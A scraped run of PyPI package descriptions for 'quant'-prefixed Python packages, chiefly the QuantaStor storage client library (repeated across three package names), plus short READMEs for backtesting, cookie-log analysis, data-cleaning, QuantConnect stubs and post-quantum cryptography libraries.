All of the published QuantaStor REST APIs as documented on the OSNEXUS documentationwikiare callable via the python client.System Requirements for QuantaStorThe QuantaStor Python Client Library requires a QuantaStor box to interact with. The minimum requirements for your storage system vary based on the workload. Use ourSolution Design Toolsto help you find the solution that best fits your use-case and budget. The minimum requirements provided in this documentation serves as the bare minimum to explore using the software and its capabilities.Intel Xeon or AMD x64 bit server (or virtual server)16GB RAM2x SSDs for system/boot drivesBoot drives should be hardware mirrored and should be atleast 64GB in size.One or more disks per system for storage pools. (SSD/NVMe/PCI SSD/SATA/SAS/FC/iSCSI/AoE)DownloadQuantaStor USB/ISO Installation Mediafor installation.InstallationInstall QuantastorTo use the QuantaStor Python Client Library, you must first install QuantaStor on your server hardware or use a QuantaStor virtual system. Installation of QuantaStor will also include python3. QuantaStor ISO files are created as hybrid ISO files which can be written to DVD media with DVD writting software or directly copied to a USB flash drive usingdd. Follow theinstallation guideon our support wiki to get started. The installation guide provides instructions for installation and configuration on both server hardware and virtual machines.RunpipInstallerUsing the PYPI pip installer run the following command to install the quantastor python client library:On Linux/Unix$ sudo python3 -m pip install quantastor-pkgTesting qs_client InstallationStart the python3 interpreter:$ python3Importquantastor_sdk_enabled()function from the library:>>> from quantastor.qs_client import quantastor_sdk_enabledThe following should print out 'True':>>> print (quantastor_sdk_enabled())ExamplesSee the./examples/directory for examples:Basic ExampleThe basic example for the QuantaStor Python Client Library (example.py) does one operation to get information about the storage system that is specified from the command line and dumps the response data in JSON format. You can use this Python script as a basic template to build off of for QuantaStor automation.StorageVolumeThe fileexample_sv.shis a bash script that utilizes two python scripts,vol_setup.pyandacl_attach.py, to create an example storage volume and host. It then utilizes theqs-utilQuantaStor tool-set to add a host initiator and login to an ISCSI session with the example storage volume.NetworkShareThe fileexample_ns.shis a bash script that utilizes theshr_setup.pypython script to create an example network share. Then using the zfsmountcommand, mounts the network share to the local mount directory/mnt/testMount.Python Interpreter UsageTo quickly do operations from the commandline you can easily utilize the QuantaStor Python Client Library strait from the Python3 interpreter. Run the following commands in the python interpreter to set up a client connection to your QuantaStor server. Replace 'hostIP', 'username', and 'password' with your own credentials:>>> from qs_client import QuantastorClient\n>>> client = QuantastorClient('hostIP', 'username', 'password')Requests are sent using HTTPS see the 'SSL Certs' section to learn to generate your own 'qs-ca-cert' to use for host verification. 
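Pulling the quantastor-pkg snippets above together, here is a minimal sketch that checks the SDK, opens a client and pretty-prints the storage system metadata. The entry imports these names from slightly different module paths ('quantastor.qs_client' and 'qs_client'); the package-qualified path is assumed here, and the host and credentials are placeholders.

import json
from quantastor.qs_client import QuantastorClient, quantastor_sdk_enabled

# Sanity check that the SDK is importable (prints True per the install test above)
print(quantastor_sdk_enabled())

# Placeholder appliance address and login; an optional fourth argument takes a
# qs-ca-cert path for HTTPS verification (see the SSL Certs notes in this entry)
client = QuantastorClient("hostIP", "username", "password")

# Fetch the storage system object and pretty-print its metadata as JSON
system = client.storage_system_get()
print(json.dumps(system.exportJson(), sort_keys=True, indent=4, separators=(",", ": ")))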
If you do not provide your own ca-cert, your client will warn you that 'requests cannot be verified'.Once you have generated an instance of the 'QuantastorClient' class you can start making REST service calls to your QuantaStor server. The following is a simple example usage similar to the 'example.py' script:>>> system = client.storage_system_get()This command will return your QuantaStor storage system as a 'StorageSystem' object. You can view the meta of any object class in JSON format (pretty print) by using the StorageSystem.exportJson() function and the dumps() function from the python json module.>>> import json\n>>> print (json.dumps(system.exportJson(), sort_keys=True, indent=4, separators=(',', ': ')))For more information about our REST API methods and objects see ourReference Guide.SSL CertsThe 'QuantastorClient' class supports HTTPS ca-cert verification. You can provide the full path to your certification file as the fourth argument when creating an instance of the 'QuantastorClient' class:client = QuantastorClient('hostIP', 'username', 'password','/full/path/to/cert')The certification path is an optional argument, but you will be warned that your requests cannot be verified if you do not provide one or if your certification path does not exist. If you do provide a valid ca-cert file, REST service calls will only succeed if your SSL verification succeeds."} +{"package": "quantastor-pyclient", "pacakge-description": "QuantaStorOSNEXUS QuantaStor Python Client LibraryThe python library for QuantaStor simplifies the process of automating QuantaStor management operations via python scripts. All of the published QuantaStor REST APIs as documented on the OSNEXUS documentationwikiare callable via the python client.System Requirements for QuantaStorThe QuantaStor Python Client Library requires a QuantaStor box to interact with. The minimum requirements for your storage system vary based on the workload. Use ourSolution Design Toolsto help you find the solution that best fits your use-case and budget. The minimum requirements provided in this documentation serves as the bare minimum to explore using the software and its capabilities.Intel Xeon or AMD x64 bit server (or virtual server)16GB RAM2x SSDs for system/boot drivesBoot drives should be hardware mirrored and should be atleast 64GB in size.One or more disks per system for storage pools. (SSD/NVMe/PCI SSD/SATA/SAS/FC/iSCSI/AoE)DownloadQuantaStor USB/ISO Installation Mediafor installation.InstallationInstall QuantastorTo use the QuantaStor Python Client Library, you must first install QuantaStor on your server hardware or use a QuantaStor virtual system. Installation of QuantaStor will also include python3. QuantaStor ISO files are created as hybrid ISO files which can be written to DVD media with DVD writting software or directly copied to a USB flash drive usingdd. Follow theinstallation guideon our support wiki to get started. 
The installation guide provides instructions for installation and configuration on both server hardware and virtual machines.RunpipInstallerUsing the PYPI pip installer run the following command to install the quantastor python client library:On Linux/Unix$ sudo python3 -m pip install quantastor-pkgTesting qs_client InstallationStart the python3 interpreter:$ python3Importquantastor_sdk_enabled()function from the library:>>> from quantastor.qs_client import quantastor_sdk_enabledThe following should print out 'True':>>> print (quantastor_sdk_enabled())ExamplesSee the./examples/directory for examples:Basic ExampleThe basic example for the QuantaStor Python Client Library (example.py) does one operation to get information about the storage system that is specified from the command line and dumps the response data in JSON format. You can use this Python script as a basic template to build off of for QuantaStor automation.StorageVolumeThe fileexample_sv.shis a bash script that utilizes two python scripts,vol_setup.pyandacl_attach.py, to create an example storage volume and host. It then utilizes theqs-utilQuantaStor tool-set to add a host initiator and login to an ISCSI session with the example storage volume.NetworkShareThe fileexample_ns.shis a bash script that utilizes theshr_setup.pypython script to create an example network share. Then using the zfsmountcommand, mounts the network share to the local mount directory/mnt/testMount.Python Interpreter UsageTo quickly do operations from the commandline you can easily utilize the QuantaStor Python Client Library strait from the Python3 interpreter. Run the following commands in the python interpreter to set up a client connection to your QuantaStor server. Replace 'hostIP', 'username', and 'password' with your own credentials:>>> from qs_client import QuantastorClient\n>>> client = QuantastorClient('hostIP', 'username', 'password')Requests are sent using HTTPS see the 'SSL Certs' section to learn to generate your own 'qs-ca-cert' to use for host verification. If you do not provide your own ca-cert, your client will warn you that 'requests cannot be verified'.Once you have generated an instance of the 'QuantastorClient' class you can start making REST service calls to your QuantaStor server. The following is a simple example usage similar to the 'example.py' script:>>> system = client.storage_system_get()This command will return your QuantaStor storage system as a 'StorageSystem' object. You can view the meta of any object class in JSON format (pretty print) by using the StorageSystem.exportJson() function and the dumps() function from the python json module.>>> import json\n>>> print (json.dumps(system.exportJson(), sort_keys=True, indent=4, separators=(',', ': ')))For more information about our REST API methods and objects see ourReference Guide.SSL CertsThe 'QuantastorClient' class supports HTTPS ca-cert verification. You can provide the full path to your certification file as the fourth argument when creating an instance of the 'QuantastorClient' class:client = QuantastorClient('hostIP', 'username', 'password','/full/path/to/cert')The certification path is an optional argument, but you will be warned that your requests cannot be verified if you do not provide one or if your certification path does not exist. 
If you do provide a valid ca-cert file, REST service calls will only succeed if your SSL verification succeeds."} +{"package": "quantastor-qsclient", "pacakge-description": "QuantaStorOSNEXUS QuantaStor Python Client LibraryThe python library for QuantaStor simplifies the process of automating QuantaStor management operations via python scripts. All of the published QuantaStor REST APIs as documented on the OSNEXUS documentationwikiare callable via the python client.System Requirements for QuantaStorThe QuantaStor Python Client Library requires a QuantaStor box to interact with. The minimum requirements for your storage system vary based on the workload. Use ourSolution Design Toolsto help you find the solution that best fits your use-case and budget. The minimum requirements provided in this documentation serves as the bare minimum to explore using the software and its capabilities.Intel Xeon or AMD x64 bit server (or virtual server)16GB RAM2x SSDs for system/boot drivesBoot drives should be hardware mirrored and should be atleast 64GB in size.One or more disks per system for storage pools. (SSD/NVMe/PCI SSD/SATA/SAS/FC/iSCSI/AoE)DownloadQuantaStor USB/ISO Installation Mediafor installation.InstallationInstall QuantastorTo use the QuantaStor Python Client Library, you must first install QuantaStor on your server hardware or use a QuantaStor virtual system. Installation of QuantaStor will also include python3. QuantaStor ISO files are created as hybrid ISO files which can be written to DVD media with DVD writting software or directly copied to a USB flash drive usingdd. Follow theinstallation guideon our support wiki to get started. The installation guide provides instructions for installation and configuration on both server hardware and virtual machines.RunpipInstallerUsing the PYPI pip installer run the following command to install the quantastor python client library:On Linux/Unix$ sudo python3 -m pip install quantastor-qsclientTesting qs_client InstallationStart the python3 interpreter:$ python3Importquantastor_sdk_enabled()function from the library:>>> from quantastor.qs_client import quantastor_sdk_enabledThe following should print out 'True':>>> print (quantastor_sdk_enabled())ExamplesSee the./examples/directory for examples:Basic ExampleThe basic example for the QuantaStor Python Client Library (example.py) does one operation to get information about the storage system that is specified from the command line and dumps the response data in JSON format. You can use this Python script as a basic template to build off of for QuantaStor automation.StorageVolumeThe fileexample_sv.shis a bash script that utilizes two python scripts,vol_setup.pyandacl_attach.py, to create an example storage volume and host. It then utilizes theqs-utilQuantaStor tool-set to add a host initiator and login to an ISCSI session with the example storage volume.NetworkShareThe fileexample_ns.shis a bash script that utilizes theshr_setup.pypython script to create an example network share. Then using the zfsmountcommand, mounts the network share to the local mount directory/mnt/testMount.Python Interpreter UsageTo quickly do operations from the commandline you can easily utilize the QuantaStor Python Client Library strait from the Python3 interpreter. Run the following commands in the python interpreter to set up a client connection to your QuantaStor server. 
Replace 'hostIP', 'username', and 'password' with your own credentials:>>> from qs_client import QuantastorClient\n>>> client = QuantastorClient('hostIP', 'username', 'password')Requests are sent using HTTPS see the 'SSL Certs' section to learn to generate your own 'qs-ca-cert' to use for host verification. If you do not provide your own ca-cert, your client will warn you that 'requests cannot be verified'.Once you have generated an instance of the 'QuantastorClient' class you can start making REST service calls to your QuantaStor server. The following is a simple example usage similar to the 'example.py' script:>>> system = client.storage_system_get()This command will return your QuantaStor storage system as a 'StorageSystem' object. You can view the meta of any object class in JSON format (pretty print) by using the StorageSystem.exportJson() function and the dumps() function from the python json module.>>> import json\n>>> print (json.dumps(system.exportJson(), sort_keys=True, indent=4, separators=(',', ': ')))For more information about our REST API methods and objects see ourReference Guide.SSL CertsThe 'QuantastorClient' class supports HTTPS ca-cert verification. You can provide the full path to your certification file as the fourth argument when creating an instance of the 'QuantastorClient' class:client = QuantastorClient('hostIP', 'username', 'password','/full/path/to/cert')The certification path is an optional argument, but you will be warned that your requests cannot be verified if you do not provide one or if your certification path does not exist. If you do provide a valid ca-cert file, REST service calls will only succeed if your SSL verification succeeds."} +{"package": "quantatrisk-tradetool", "pacakge-description": "Internal toolingFree software: BSD 2-Clause LicenseInstallationpip install quantatrisk-tradetoolYou can also install the in-development version with:pip install git+ssh://git@quantatrisk_tradetool/pablomasior/python-quantatrisk_tradetool.git@mainDocumentationhttps://python-quantatrisk_tradetool.readthedocs.io/DevelopmentTo run all the tests run:toxNote, to combine the coverage data from all the tox environments run:Windowsset PYTEST_ADDOPTS=--cov-append\ntoxOtherPYTEST_ADDOPTS=--cov-append toxChangelog0.0.0 (2022-03-31)First release on PyPI."} +{"package": "quantaxis", "pacakge-description": "QUANTAXIS Financial Framework"} +{"package": "quantaxisbackend", "pacakge-description": "quantaxisbackend==============="} +{"package": "quantaxis-otgbroker", "pacakge-description": "publisher and subscriber"} +{"package": "quantaxis-pubsub", "pacakge-description": "publisher and subscriber"} +{"package": "quantaxis-randomprice", "pacakge-description": "random price"} +{"package": "quantaxis-run", "pacakge-description": "automatic run quantaxis program"} +{"package": "quantaxis-servicedetect", "pacakge-description": "qaservicedetect"} +{"package": "quantaxis-webserver", "pacakge-description": "quantaxis webserver"} +{"package": "quantaxis-wechat", "pacakge-description": "quantaxis wechat server"} +{"package": "quantbacktest", "pacakge-description": "AccessRepository (GitLab):https://gitlab.com/fsbc/theses/quantbacktestPyPI:https://pypi.org/project/quantbacktest/Master's thesis:https://ssrn.com/abstract=3620154SetupInstall the project via the shell:pip install quantbacktest.Update to a newer version via the shell (do this twice!):pip install quantbacktest --upgrade.Exemplary usagefrom quantbacktest import backtest_visualizer\n\n# Importing modules from this 
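As a small complement to the SSL notes in this entry, the sketch below guards the optional fourth ca-cert argument with an existence check before constructing the client; the path and credentials are placeholders and the module path is assumed as in the earlier sketch.

import os
from quantastor.qs_client import QuantastorClient  # module path assumed

cert_path = "/full/path/to/cert"  # placeholder qs-ca-cert location

# Warn early instead of relying on the client's "requests cannot be verified" warning
if not os.path.exists(cert_path):
    print("ca-cert not found; HTTPS requests will not be verified")
    client = QuantastorClient("hostIP", "username", "password")
else:
    client = QuantastorClient("hostIP", "username", "password", cert_path)

system = client.storage_system_get()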
repository\nimport sys\n\n# For managing dates\nfrom datetime import datetime\n\n# For allowing for flexible time differences (frequencies)\nfrom pandas.tseries.offsets import Timedelta\n\n\ndisplay_options = {\n 'boolean_plot_heatmap': False,\n 'boolean_test': False, # If multi-asset strategy is used, this will cause sampling of the signals to speed up the run for testing during development.\n 'warning_no_price_for_last_day': False,\n 'warning_no_price_during_execution': False,\n 'warning_no_price_for_intermediate_valuation': True,\n 'warning_alternative_date': False,\n 'warning_calculate_daily_returns_alternative_date': False,\n 'warning_no_price_for_calculate_daily_returns': False,\n 'warning_buy_order_could_not_be_filled': True,\n 'warning_sell_order_could_not_be_filled': True,\n 'errors_on_benchmark_gap': True,\n 'boolean_plot_equity_curve': False,\n 'boolean_save_equity_curve_to_disk': True,\n 'string_results_directory': '/home/janspoerer/code/janspoerer/tmp/results'\n}\n\ngeneral_settings = {\n 'rounding_decimal_places': 4,\n 'rounding_decimal_places_for_security_quantities': 0,\n}\n\nexcel_worksheet_name = 'weights'\n\nstrategy_hyperparameters = {\n 'maximum_deviation_in_days': 300,\n 'prices_table_id_column_name': 'token_itin',\n 'excel_worksheet_name': excel_worksheet_name, # Set this to None if CSV is used!\n # For OpenMetrics: 9.8\n 'buy_parameter_space': [9.8], # [11, 20] # Times 10! Will be divided by 10.\n # For OpenMetrics: 9.7\n 'sell_parameter_space': [9.7], # [5, 9] # Times 10! Will be divided by 10.\n 'maximum_relative_exposure_per_buy': 0.34,\n 'frequency': Timedelta(days=1),\n 'moving_average_window_in_days': 14,\n 'id': 'TP3B-248N-Q',\n 'boolean_allow_partially_filled_orders': True,\n 'string_file_path_with_signal_data': '/home/janspoerer/code/janspoerer/quantbacktest/quantbacktest/assets/strategy_tables/test.csv'\n}\n\nconstraints = {\n 'maximum_individual_asset_exposure_all': 1.0, # Not yet implemented\n 'maximum_individual_asset_exposure_individual': {}, # Not yet implemented\n 'maximum_gross_exposure': 1.0, # Already implemented\n 'boolean_allow_shortselling': False, # Shortselling not yet implemented\n 'minimum_cash': 100,\n}\n\ncomments = {\n 'display_options': repr(display_options),\n 'strategy_hyperparameters': repr(strategy_hyperparameters)\n}\n\nbacktest_visualizer(\n file_path_with_price_data='/home/janspoerer/code/janspoerer/quantbacktest/quantbacktest/assets/raw_itsa_data/20190717_itsa_tokenbase_top600_wtd302_token_daily.csv',\n # ONLY LEAVE THIS LINE UNCOMMENTED IF YOU WANT TO USE ETH-ADDRESSES AS ASSET IDENTIFIERS!\n # file_path_with_token_data='raw_itsa_data/20190717_itsa_tokenbase_top600_wtd301_token.csv', # Only for multi-asset strategies.\n name_of_foreign_key_in_price_data_table='token_itin',\n name_of_foreign_key_in_token_metadata_table='token_itin',\n # 1: execute_strategy_white_noise()\n # 2: Not used anymore, can be reassigned\n # 3: execute_strategy_multi_asset() -> Uses strategy table\n # 4: execute_strategy_ma_crossover()\n int_chosen_strategy=4,\n dict_crypto_options={\n 'general': {\n 'percentage_buying_fees_and_spread': 0.005, # 0.26% is the taker fee for low-volume clients at kraken.com https://www.kraken.com/features/fee-schedule\n 'percentage_selling_fees_and_spread': 0.005, # 0.26% is the taker fee for low-volume clients at kraken.com https://www.kraken.com/features/fee-schedule\n # Additional fees may apply for depositing money.\n 'absolute_fee_buy_order': 0.0,\n 'absolute_fee_sell_order': 0.0,\n }\n },\n 
float_budget_in_usd=1000000.00,\n strategy_hyperparameters=strategy_hyperparameters,\n margin_loan_rate=0.05,\n list_times_of_split_for_robustness_test=[\n [datetime(2014, 1, 1), datetime(2019, 5, 30)]\n ],\n benchmark_data_specifications={\n 'name_of_column_with_benchmark_primary_key': 'id', # Will be id after processing. Columns will be renamed.\n 'benchmark_key': 'TP3B-248N-Q', # Ether: T22F-QJGB-N, Bitcoin: TP3B-248N-Q\n 'file_path_with_benchmark_data': '/home/janspoerer/code/janspoerer/quantbacktest/quantbacktest/assets/raw_itsa_data/20190717_itsa_tokenbase_top600_wtd302_token_daily.csv',\n 'risk_free_rate': 0.02\n },\n display_options=display_options,\n constraints=constraints,\n general_settings=general_settings,\n comments=comments,\n)Information for maintainers/contributorsTo make changes available in GitLab and as apip install, please first push your changes to a new branch to GitLab and merge them.Update the version number inVERSION.Build wheel:python setup.py sdist bdist_wheel.Upload to PyPI:twine upload --skip-existing dist/*.*Get the current version on your machine:pip install quantbacktest --upgradeMaintainers can also refer to this great guide:https://realpython.com/pypi-publish-python-package/#versioning-your-packageFurther reference to quant trading in generalQuantopianoffers state-of-the art backtesting for quantitative trading strategies for equity markets. TheirYouTube channelhosts some excellent, generally applicable talks from renowned experts:\"When Should You Build Your Own Backtester?\" by Dr. Michael Halls-Moore\"Optimizing Trading Strategies without Overfitting\" by Dr. Ernest Chan - QuantCon 2018\"Beware of Low Frequency Data\" by Ernest Chan"} +{"package": "quantbet-dyno", "pacakge-description": "No description available on PyPI."} +{"package": "quantbox", "pacakge-description": "No description available on PyPI."} +{"package": "quantbt", "pacakge-description": "A hyper efficient backtesting engine with traders and quant researchers in mind.It usesnumba.InstallationYou need to havepoetryinstalled on your system. Then run the followingpoetryinstall\npoetryinstall--all-extras"} +{"package": "quantbullet", "pacakge-description": "quantbulletquantbulletis a toolkit designed for streamlined quantitative analysis in finance. The goals for this package are:To provide a practical set of tools for prototyping quantitative research ideas.To integrate and test contemporary research findings, primarily from academic sources, ensuring they're actionable.While I initially developed this package for my own needs, I intend to maintain it consistently. If it assists others in their endeavors, I consider that a success.Installation$pipinstallquantbulletUsageStatistical Jump Models. Seethis notebookfor an example. Statistical jump models are a type of regime-switching model that applies clustering algorithms to temporal financial data, explicitly penalizing jumps between different financial regimes to capture true persistence in underlying regime-switching processes.ContributingInterested in contributing? Check out the contributing guidelines. Please note that this project is released with a Code of Conduct. By contributing to this project, you agree to abide by its terms.Licensequantbulletwas created by Yiming Zhang. 
It is licensed under the terms of the MIT license.CreditsThis project developement is generously supported by JetBrains softwares with their Open Source development license.quantbulletwas created withcookiecutterand thepy-pkgs-cookiecuttertemplate.Python Packagesis an excellent resource for learning how to create and publish Python packages."} +{"package": "quantc", "pacakge-description": "No description available on PyPI."} +{"package": "quantcast-cli", "pacakge-description": "Quantcast CLIFor convenience, read theDocumentation.IntroductionQuantcast CLI, accessible via thectopcommand, is designed to analyze cookie log files and identify the most active cookie on a specified date. It processes files containing cookie IDs along with their corresponding timestamps, and outputs the most frequently encountered cookie ID for a given day.InstallationTo install Quantcast CLI, use pip by running the following command in your terminal:$pipinstallquantcast_cli---> 100%installedMake sure Python and pip are installed on your system before executing the above command.UsageThectopcommand requires a log file in CSV format with each record comprising a cookie ID and a timestamp. It accepts the following main arguments:-for--file: Specifies the path to the cookie log file. The default value iscookie_log.csv.-dor--date: Sets the target date for which to find the most active cookie, formatted asYYYY-MM-DD. The default date is2018-12-09.Command Syntax$ctop--helpUsage: ctop [OPTIONS]\u256d\u2500 Options \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256e\u2502 --file -f PATH Cookies file path [default: cookie_log.csv] \u2502\u2502 --date -d [%Y-%m-%d] Targeted date in UTC format [default: 2018-12-09] \u2502\u2502 --install-completion Install completion for the current shell. \u2502\u2502 --show-completion Show completion for the current shell. \u2502\u2502 --help Show this message and exit. 
\u2502\u2570\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256fExampleTo find the most active cookie on December 9, 2018, from a file namedcookie_log.csv, use:$ctop-fcookie_log.csv-d2018-12-09AtY0laUfhglK3lC7This command outputs the cookie ID(s) with the highest number of occurrences on the specified date to stdout.Options--install-completion: Installs shell completion for the current shell.--show-completion: Displays the completion setup script for the current shell, allowing you to copy or customize its installation.--help: Shows the help message, detailing all available options.Running with DockerFor users who prefer Docker or wish to run the Quantcast CLI tool in a containerized environment, we have provided a Docker image. This method simplifies the execution process and ensures compatibility across different environments.PrerequisitesDocker must be installed on your system. For installation instructions, refer to theofficial Docker documentation.UsageTo run the Quantcast CLI tool using Docker, you can use the following command structure:$dockerrun-it--rm-v/cookie_log.csv:/file.csv\\itismoej/ctop-f/file.csv-dYYYY-MM-DDsome-cookie-keyReplace/cookie_log.csvwith the full path to your cookie log file on your host machine,/file.csvwith the path and file name you want to use inside the container, andYYYY-MM-DDwith the target date you're interested in.ExampleIf you have a cookie log file namedcookie_log.csvlocated in/homeon your machine, and you want to find the most active cookie forDecember 9, 2018, the command would look like this:$dockerrun-it--rm-v/home/cookie_log.csv:/cookie_log.csv\\itismoej/ctop-f/cookie_log.csv-d2018-12-09AtY0laUfhglK3lC7This command mounts thecookie_log.csvfile from your host into the Docker container and executes the ctop command inside the container to process the file. The-itflag is used to run the container interactively, and--rmensures that the container is removed after execution to prevent accumulation of unused containers.NotesEnsure that the volume mapping (-vflag) correctly reflects the path to your cookie log file on your host and the desired path within the container.The Docker imageitismoej/ctopis the official image for running the Quantcast CLI tool. 
Make sure to pull the latest version if you haven't done so recently.Using Docker to run the Quantcast CLI tool provides a seamless and environment-independent way to analyze your cookie log files, eliminating the need for local Python environment setup.File FormatYour cookie log file must adhere to the following structure:cookie,timestampHere, each line should contain a cookie ID, followed by its timestamp in the ISO 8601 format (YYYY-MM-DDTHH:MM:SS+00:00), separated by a comma andsorted by timestamps in reverse order.Sample Log Filecookie,timestamp\nAtY0laUfhglK3lC7,2018-12-09T14:19:00+00:00\nSAZuXPGUrfbcn5UA,2018-12-09T10:13:00+00:00\n...PerformanceThe Quantcast CLI tool is optimized for high performance, capable of processing extensive datasets with efficiency. Below are the key performance optimizations that enable the tool to handle millions of records swiftly:Multi-processing with MapReduceQuantcast CLI employs a multi-processing strategy, enhanced by the MapReduce programming model, to leverage the computing power of modern multi-core processors effectively. This approach allows the tool to parallelize the data processing workload across multiple cores, significantly reducing the overall processing time. The MapReduce model splits the processing task into two main phases: the Map phase, where the dataset is divided into smaller chunks that are processed in parallel, and the Reduce phase, where the results of these parallel processes are combined into a final output. This method is particularly effective for analyzing extensive log files, enabling the tool to process 8 million records in just 5 seconds on a computer with 4 CPU cores.Binary Search on Sorted TimestampsThe tool assumes that timestamps in the cookie log file are sorted. This assumption allows for the use of a binary search algorithm when filtering records by the specified date. This efficiency gain is crucial when dealing with large datasets, as it minimizes the time required to locate and filter records by date.LicenceThis project is licensed under the terms of the MIT license."} +{"package": "quantclean", "pacakge-description": "Quantclean \ud83e\uddf9\"Make it cleaner, make it leaner\"Already used by several people working in the quant and finance industries, Quantclean is the all-in-one tool that will help you to reformat your dataset and clean it.Quantclean is a program thatreformatsevery financial dataset toUS Equity TradeBar(Quantconnect format)We all faced the problem of reformating or data to a standard. Manual data cleaning is clearly boring and take time. Quantclean is here to help you and to make you life easier as a quant.Works great with datas from Quandl, Algoseek, Alpha Vantage, yfinance, and many other more...Few things you may want to know before getting started \ud83c\udf49Even if you don't have an open, close, volume, high, low, date column, quantclean will create a blank column for it. 
No problem!The dataframe generated will look like this if you have a date and time column (or if both are on the same column):DateOpenHighLowCloseVolume20131001 09:00644800064480006448000644800090Date - String date \"YYYYMMDD HH:MM\" in the timezone of the data format.Open - Deci-cents Open Price for TradeBar.High - Deci-cents High Price for TradeBar.Low - Deci-cents Low Price for TradeBar.Close - Deci-cents Close Price for TradeBar.Volume - Number of shares traded in this TradeBar.You can also get something like that if use thesweeper_dashfunction instead ofsweeperDateOpenHighLowCloseVolume2013-10-01 09:00:00644800064480006448000644800090As you can see, the date format is YYYY-MM-DD and no more YYYYMMDD.If you just have a date column (e.g : something like YYYY-MM-DD), it will look like this:DateOpenHighLowCloseVolume20131001644800064480006448000644800090You can also use thesweeper_dashfunction here.How to use it? \ud83d\ude80First, download the quantclean.py file in the folder where you are workingNote : I took this data from Quandl, your dataset doesn't have to look like this one necessarily, quantclean adapts to your dataset as well as possiblefrom quantclean import sweeper\n\ndf = pd.read_csv('AS-N100.csv')\ndf_df = sweeper(df)\n_dfOutput:Now, you may not be happy of this date colum which is presented in the YYYYMMDD format and maybe be prefer YYYY-MM-DD.In that case do :df_dash = sweeper_dash(df)\ndf_dashOutput:ContributionIf you have some suggestions or improvements don't hesitate to create an issue or make a pull request. Any help is welcome!"} +{"package": "quantclient", "pacakge-description": "Quant Client is a Python client for the Quant API.Installing Quant ClientInstall the Quant Client Python package (and dependencies) either by running:$ pip install quantclientOr by downloading the Quant Clinet tarball, unpacking and running:$ python setup.py install"} +{"package": "quantcloud", "pacakge-description": "# quantcloudref:http://guide.python-distribute.org/creation.html"} +{"package": "quantcluster", "pacakge-description": "UNKNOWN"} +{"package": "quantcoin", "pacakge-description": "This simple project is an example repo for Python projects.Learn more.If you want to learn more aboutsetup.pyfiles, check outthis repository.# Build Distpython3 setup.py sdist bdist_wheel# Upload Dist\npython3 -m twine upload dist/*"} +{"package": "quantcomp", "pacakge-description": "No description available on PyPI."} +{"package": "quantconnect", "pacakge-description": "No description available on PyPI."} +{"package": "quantconnect-api", "pacakge-description": "No description available on PyPI."} +{"package": "quantconnect-cli", "pacakge-description": "No description available on PyPI."} +{"package": "quantconnect-lean", "pacakge-description": "No description available on PyPI."} +{"package": "quantconnect-stubs", "pacakge-description": "QuantConnect StubsThis package contains type stubs for QuantConnect'sLeanalgorithmic trading engine and for parts of the .NET library that are used by Lean.These stubs can be used by editors to provide type-aware features like autocomplete and auto-imports in QuantConnect strategies written in Python.After installing the stubs, you can copy the following line to the top of every Python file to have the same imports as the ones that are added by default in the cloud:fromAlgorithmImportsimport*This line importsall common QuantConnect membersand provides autocomplete for them."} +{"package": "quantcrypt", "pacakge-description": "QuantCryptDescriptionQuantCrypt is a 
cross-platform Python library for Post-Quantum Cryptography using precompiled PQClean binaries.QuantCrypt contains only thestrongestvariants of the PQC algorithms from theNIST PQC standardization processas recommended by theCNSA advisory by NSA.MotivationCurrently, there does not exist any pure-Python implementation of Post-Quantum Cryptographic algorithms,\nwhich requires Python developers to first discover where to get reliable C source code of PQC algorithms,\nthen install the necessary C compilers on their system and then figure out how to use CFFI to compile and\nuse the C code in their Python source code. Furthermore, those binaries would be only compatible with the\nplatform that they were compiled on, making it very difficult to use separate platforms for development\nand deployment workflows, without having to recompile the C source code each time.This library solves this problem by pre-compiling the C source code of PQC algorithms for Windows, Linux and\nDarwin platforms in GitHub Actions using CFFI, and it also provides a nice Python wrapper around the PQC binaries.\nSince I wanted this library to be all-encompassing, it also contains a lot of helper classes which one might need\nwhen working with Post-Quantum cryptography. This library places a lot of focus on Developer Experience, aiming\nto be powerful in features, yet easy and enjoyable to use, so it wouldjust workfor your project.QuickstartThe full documentation of this library can be found in theWiki.\nBecause this library is rich in docstrings which provide detailed insight into the library's behavior,\nit is suggested to use an IDE which supports autocomplete and intellisense when working with this library.InstallpipinstallquantcryptScript Importsfromquantcryptimport(kem,# Key Encapsulation Mechanism algos - public-key cryptographydss,# Digital Signature Scheme algos - secret-key signaturescipher,# The Krypton Cipher - symmetric cipher based on AES-256kdf,# Argon2 helpers + KMAC-KDF - key derivation functionserrors,# All errors QuantCrypt may raise - also available from other modulesutils# Helper utilities from all modules - gathered into one module)CLI CommandsThe general functionality of this library is also available from the command-line, which you can access\nwith theqclibcommand. Keep in mind that if you install QuantCrypt into a venv, you will need to activate\nthe venv to access the CLI. 
